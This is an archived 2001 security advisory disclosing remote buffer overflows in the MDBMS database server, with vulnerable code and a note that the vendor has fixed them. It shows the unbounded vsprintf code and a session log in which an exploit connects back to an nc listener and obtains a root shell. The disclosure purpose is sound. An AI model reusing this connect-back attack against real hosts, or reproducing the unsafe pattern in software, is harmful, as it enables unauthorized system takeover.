Remote buffer overflow in MDBMS.

2001-06-14T00:00:00
ID SECURITYVULNS:DOC:1722
Type securityvulns
Reporter Securityvulns
Modified 2001-06-14T00:00:00

Description

Dear bugtraq readers,

MDBMS is a SQL database server (currently) for UNIX systems. Version 0.99b9 and below versions contain an exploitable buffer overflow in the handling of the \s console command.

When a user passes large buffers to the server in the form of multiple lines, these are appended to the end of each other. A subsequent call to the \s command causes the overflow.

Below is faulty code (from interface.cc):

void user::uprintf(char s, ...) { char b[10000]; int len=strlen(outbuf), newlen; va_list ap; va_start(ap,s); vsprintf(b,s,ap); <---- va_end(ap); newlen=strlen(b); while (newlen+len+10>=outsize) outbuf=(char)realloc(outbuf,outsize+=1000); strcat(outbuf,b); FD_SET(fd,&parent->wmask); }

mu-b also found a buffer overflow in the "create database" system. This was actually caused by a sprintf that generated the name of the management variable. This has been fixed - now table and database names can no longer be larger than 128 bytes.

Information about the overflows was sent to marty@hinttech.com. He has now fixed the problems, and new versions of MDBMS can be found at: http://www.hinttech.com/mdbms/

We would like to thank Marty for kind response and quick update.

Exploit example:

[teleh0r@localhost mdbms]$ ./mdbms-pms.pl

-- Remote code execution exploit - MDBMS <= 0.99b -- <teleh0r@digit-labs.org> - Copyright (c) 2001

Usage: ./mdbms-pms.pl -t <hostname> -b <back>

 -t &lt;hostname&gt;    : hostname to test
 -b &lt;back&gt;        : connect back to ip
 -p &lt;port&gt;        : port &#40;default: 2223&#41;
 -d &lt;delay&gt;       : delay before timeout
 -o &lt;offset&gt;      : offset
 -h               : return to heap

[teleh0r@localhost mdbms]$ nc -l -v -p 1337 & [1] 2070 listening on [any] 1337 ...

[teleh0r@localhost mdbms]$ ./mdbms-pms.pl -t 127.1 -b localhost -h

-- Remote code execution exploit - MDBMS <= 0.99b -- <teleh0r@digit-labs.org> - Copyright (c) 2001

-> Connected to: 127.1 / MDBMS V0.99b9 ready. -> Address : 0x302027d / xor-mask: 0x2020202 -> Return : 0x80cfe76 / using the heap ... -> Sending payload: ...

-> * Successfully sent payload - good luck!

connect to [127.0.0.1] from localhost.localdomain [127.0.0.1] 1189 [teleh0r@localhost mdbms]$ % nc -l -v -p 1337 whoami; uname -mnrsp root Linux localhost.localdomain 2.4.2-2 i686 unknown ...

Exploit code attached.

Sincerely yours, teleh0r and mu-b

-- To avoid criticism, do nothing, say nothing, be nothing. -- Elbert Hubbard